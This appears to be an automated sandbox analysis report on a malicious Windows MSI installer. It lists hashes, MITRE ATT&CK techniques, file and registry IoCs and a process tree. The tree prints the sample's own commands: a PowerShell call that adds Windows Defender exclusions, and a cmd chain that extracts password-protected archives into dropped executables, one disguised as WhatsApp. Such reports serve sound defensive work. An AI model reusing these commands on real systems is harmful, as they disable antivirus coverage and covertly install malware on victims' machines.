e1fb8b47f237c56c9409de2cd1e04c49a0da76f1b2f62341d97394463f96d323

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
16-11-2024 13:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e1fb8b47f237c56c9409de2cd1e04c49a0da76f1b2f62341d97394463f96d323.msi
Size

37.8MB
MD5

1eb0c7fbfca2f95b76189279eadb9228
SHA1

ef89821dff0b19fb6bac92808f0e42fdd88eb7c7
SHA256

e1fb8b47f237c56c9409de2cd1e04c49a0da76f1b2f62341d97394463f96d323
SHA512

d22f351cbaa2ac225ff9c472c0404098a332bc4de1ca29465d5e6189e3420b2107e7cf6c087dcde0bf05a39668f751484a72386e7055e63be6ba355fea3e4e7e
SSDEEP

786432:ouZ/E3Y4OJSMSsNuicJ6AEJX9WQnItNe4mzSllmeALf:RMYTJG5EtJnGNe4mzSfn

Score

8^/10

discovery execution persistence privilege_escalation

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1188	powershell.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Program Files directory 19 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\UpgradeValiantSupervisor\VAEeuoHuQuOLljROMdYRVrWysOrkCm	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
File created	C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.vbs	ZhObbZwOavDN.exe
File created	C:\Program Files\UpgradeValiantSupervisor\FRHCPRDSCKpKTwMdXJauvGnbrrBSLW	msiexec.exe
File created	C:\Program Files\UpgradeValiantSupervisor\MOELauncherSetup_V0TKW.exe	msiexec.exe
File opened for modification	C:\Program Files\UpgradeValiantSupervisor\jJdRJSuAKBvtXRTgfinkngKoulBasD	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
File created	C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe	MsiExec.exe
File created	C:\Program Files\UpgradeValiantSupervisor\jJdRJSuAKBvtXRTgfinkngKoulBasD	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
File opened for modification	C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.xml	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
File created	C:\Program Files\UpgradeValiantSupervisor\VAEeuoHuQuOLljROMdYRVrWysOrkCm	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
File opened for modification	C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
File opened for modification	C:\Program Files\UpgradeValiantSupervisor\2_ZhObbZwOavDN.exe	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
File created	C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.exe	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
File created	C:\Program Files\UpgradeValiantSupervisor\NExERxptCnfNovdPQUVKIftjqvLPvD.exe	msiexec.exe
File created	C:\Program Files\UpgradeValiantSupervisor\WhatsApp1.exe	msiexec.exe
File opened for modification	C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe	MsiExec.exe
File created	C:\Program Files\UpgradeValiantSupervisor\2_ZhObbZwOavDN.exe	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
File opened for modification	C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.exe	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
File created	C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.xml	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
File created	C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN	NExERxptCnfNovdPQUVKIftjqvLPvD.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.ev3	DrvInst.exe
File opened for modification	C:\Windows\Installer\f770139.msi	msiexec.exe
File created	C:\Windows\Installer\f770139.msi	msiexec.exe
File created	C:\Windows\Installer\f77013a.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI213.tmp	msiexec.exe
File created	C:\Windows\Installer\f77013c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f77013a.ipi	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev1	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe

Executes dropped EXE 4 IoCs

pid	Process
2044	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
592	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
2960	ZhObbZwOavDN.exe
2404	WhatsApp1.exe

Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs

persistence privilege_escalation

Installer Packages

T1546.016

Msiexec

T1218.007

pid	Process
2196	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ZhObbZwOavDN.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1548	cmd.exe
1244	PING.EXE

Modifies data under HKEY_USERS 48 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b08a919c2c38db01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe

Modifies registry class 22 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\Version = "84410373"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F40D3C9F0B2AFBA4AAD1FA0B9B8BA863	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\SourceList\Media\1 = ";"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\DFF86025C7A5F5543BC7555DD9EB9568	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\AuthorizedLUAApp = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F40D3C9F0B2AFBA4AAD1FA0B9B8BA863\DFF86025C7A5F5543BC7555DD9EB9568	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\SourceList	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\SourceList\PackageName = "e1fb8b47f237c56c9409de2cd1e04c49a0da76f1b2f62341d97394463f96d323.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\DFF86025C7A5F5543BC7555DD9EB9568\ProductFeature	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\ProductName = "UpgradeValiantSupervisor"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\PackageCode = "034EDA160E21BFF4487E3C8D30FD36D5"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\AdvertiseFlags = "388"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DFF86025C7A5F5543BC7555DD9EB9568\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1244	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

pid	Process
2044	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
592	NExERxptCnfNovdPQUVKIftjqvLPvD.exe

Suspicious behavior: EnumeratesProcesses 53 IoCs

pid	Process
2408	msiexec.exe
2408	msiexec.exe
1188	powershell.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe
2960	ZhObbZwOavDN.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2196	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2196	msiexec.exe
Token: SeRestorePrivilege	2408	msiexec.exe
Token: SeTakeOwnershipPrivilege	2408	msiexec.exe
Token: SeSecurityPrivilege	2408	msiexec.exe
Token: SeCreateTokenPrivilege	2196	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2196	msiexec.exe
Token: SeLockMemoryPrivilege	2196	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2196	msiexec.exe
Token: SeMachineAccountPrivilege	2196	msiexec.exe
Token: SeTcbPrivilege	2196	msiexec.exe
Token: SeSecurityPrivilege	2196	msiexec.exe
Token: SeTakeOwnershipPrivilege	2196	msiexec.exe
Token: SeLoadDriverPrivilege	2196	msiexec.exe
Token: SeSystemProfilePrivilege	2196	msiexec.exe
Token: SeSystemtimePrivilege	2196	msiexec.exe
Token: SeProfSingleProcessPrivilege	2196	msiexec.exe
Token: SeIncBasePriorityPrivilege	2196	msiexec.exe
Token: SeCreatePagefilePrivilege	2196	msiexec.exe
Token: SeCreatePermanentPrivilege	2196	msiexec.exe
Token: SeBackupPrivilege	2196	msiexec.exe
Token: SeRestorePrivilege	2196	msiexec.exe
Token: SeShutdownPrivilege	2196	msiexec.exe
Token: SeDebugPrivilege	2196	msiexec.exe
Token: SeAuditPrivilege	2196	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2196	msiexec.exe
Token: SeChangeNotifyPrivilege	2196	msiexec.exe
Token: SeRemoteShutdownPrivilege	2196	msiexec.exe
Token: SeUndockPrivilege	2196	msiexec.exe
Token: SeSyncAgentPrivilege	2196	msiexec.exe
Token: SeEnableDelegationPrivilege	2196	msiexec.exe
Token: SeManageVolumePrivilege	2196	msiexec.exe
Token: SeImpersonatePrivilege	2196	msiexec.exe
Token: SeCreateGlobalPrivilege	2196	msiexec.exe
Token: SeBackupPrivilege	2788	vssvc.exe
Token: SeRestorePrivilege	2788	vssvc.exe
Token: SeAuditPrivilege	2788	vssvc.exe
Token: SeBackupPrivilege	2408	msiexec.exe
Token: SeRestorePrivilege	2408	msiexec.exe
Token: SeRestorePrivilege	2832	DrvInst.exe
Token: SeRestorePrivilege	2832	DrvInst.exe
Token: SeRestorePrivilege	2832	DrvInst.exe
Token: SeRestorePrivilege	2832	DrvInst.exe
Token: SeRestorePrivilege	2832	DrvInst.exe
Token: SeRestorePrivilege	2832	DrvInst.exe
Token: SeRestorePrivilege	2832	DrvInst.exe
Token: SeLoadDriverPrivilege	2832	DrvInst.exe
Token: SeLoadDriverPrivilege	2832	DrvInst.exe
Token: SeLoadDriverPrivilege	2832	DrvInst.exe
Token: SeRestorePrivilege	2408	msiexec.exe
Token: SeTakeOwnershipPrivilege	2408	msiexec.exe
Token: SeRestorePrivilege	2408	msiexec.exe
Token: SeTakeOwnershipPrivilege	2408	msiexec.exe
Token: SeRestorePrivilege	2408	msiexec.exe
Token: SeTakeOwnershipPrivilege	2408	msiexec.exe
Token: SeDebugPrivilege	1188	powershell.exe
Token: SeRestorePrivilege	2044	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
Token: 35	2044	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
Token: SeSecurityPrivilege	2044	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
Token: SeSecurityPrivilege	2044	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
Token: SeRestorePrivilege	592	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
Token: 35	592	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
Token: SeSecurityPrivilege	592	NExERxptCnfNovdPQUVKIftjqvLPvD.exe
Token: SeSecurityPrivilege	592	NExERxptCnfNovdPQUVKIftjqvLPvD.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2196	msiexec.exe
2196	msiexec.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 2408 wrote to memory of 2900	2408	msiexec.exe	35
PID 2408 wrote to memory of 2900	2408	msiexec.exe	35
PID 2408 wrote to memory of 2900	2408	msiexec.exe	35
PID 2408 wrote to memory of 2900	2408	msiexec.exe	35
PID 2408 wrote to memory of 2900	2408	msiexec.exe	35
PID 2900 wrote to memory of 1188	2900	MsiExec.exe	37
PID 2900 wrote to memory of 1188	2900	MsiExec.exe	37
PID 2900 wrote to memory of 1188	2900	MsiExec.exe	37
PID 2900 wrote to memory of 1548	2900	MsiExec.exe	39
PID 2900 wrote to memory of 1548	2900	MsiExec.exe	39
PID 2900 wrote to memory of 1548	2900	MsiExec.exe	39
PID 1548 wrote to memory of 2044	1548	cmd.exe	41
PID 1548 wrote to memory of 2044	1548	cmd.exe	41
PID 1548 wrote to memory of 2044	1548	cmd.exe	41
PID 1548 wrote to memory of 2044	1548	cmd.exe	41
PID 1548 wrote to memory of 1244	1548	cmd.exe	42
PID 1548 wrote to memory of 1244	1548	cmd.exe	42
PID 1548 wrote to memory of 1244	1548	cmd.exe	42
PID 1548 wrote to memory of 592	1548	cmd.exe	44
PID 1548 wrote to memory of 592	1548	cmd.exe	44
PID 1548 wrote to memory of 592	1548	cmd.exe	44
PID 1548 wrote to memory of 592	1548	cmd.exe	44
PID 2900 wrote to memory of 2960	2900	MsiExec.exe	46
PID 2900 wrote to memory of 2960	2900	MsiExec.exe	46
PID 2900 wrote to memory of 2960	2900	MsiExec.exe	46
PID 2900 wrote to memory of 2960	2900	MsiExec.exe	46
PID 2900 wrote to memory of 2404	2900	MsiExec.exe	48
PID 2900 wrote to memory of 2404	2900	MsiExec.exe	48
PID 2900 wrote to memory of 2404	2900	MsiExec.exe	48
PID 2404 wrote to memory of 2508	2404	WhatsApp1.exe	49
PID 2404 wrote to memory of 2508	2404	WhatsApp1.exe	49
PID 2404 wrote to memory of 2508	2404	WhatsApp1.exe	49

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\e1fb8b47f237c56c9409de2cd1e04c49a0da76f1b2f62341d97394463f96d323.msi
1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2196

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2408
- C:\Windows\system32\MsiExec.exe
  C:\Windows\system32\MsiExec.exe -Embedding 15D0C9DC1847F322A412425671DC0E89 M Global\MSI0000
  2⤵
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\UpgradeValiantSupervisor','C:\Program Files','C:\Program Files'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1188
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\UpgradeValiantSupervisor\NExERxptCnfNovdPQUVKIftjqvLPvD.exe" x "C:\Program Files\UpgradeValiantSupervisor\FRHCPRDSCKpKTwMdXJauvGnbrrBSLW" -o"C:\Program Files\UpgradeValiantSupervisor\" -p"44087mU[5d*Fa.9tO{bb" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\UpgradeValiantSupervisor\NExERxptCnfNovdPQUVKIftjqvLPvD.exe" x "C:\Program Files\UpgradeValiantSupervisor\jJdRJSuAKBvtXRTgfinkngKoulBasD" -x!1_ZhObbZwOavDN.exe -x!sss -x!1_YeIgTCQVJGErbtEGGiDlTxgCffkbDZ.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\UpgradeValiantSupervisor\" -p"04434k+1^Z$HJ^mp6+xz" -y
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:1548
  - - C:\Program Files\UpgradeValiantSupervisor\NExERxptCnfNovdPQUVKIftjqvLPvD.exe
      "C:\Program Files\UpgradeValiantSupervisor\NExERxptCnfNovdPQUVKIftjqvLPvD.exe" x "C:\Program Files\UpgradeValiantSupervisor\FRHCPRDSCKpKTwMdXJauvGnbrrBSLW" -o"C:\Program Files\UpgradeValiantSupervisor\" -p"44087mU[5d*Fa.9tO{bb" -y
      4⤵
      Drops file in Program Files directory
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious use of AdjustPrivilegeToken
      PID:2044
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.1 -n 2
      4⤵
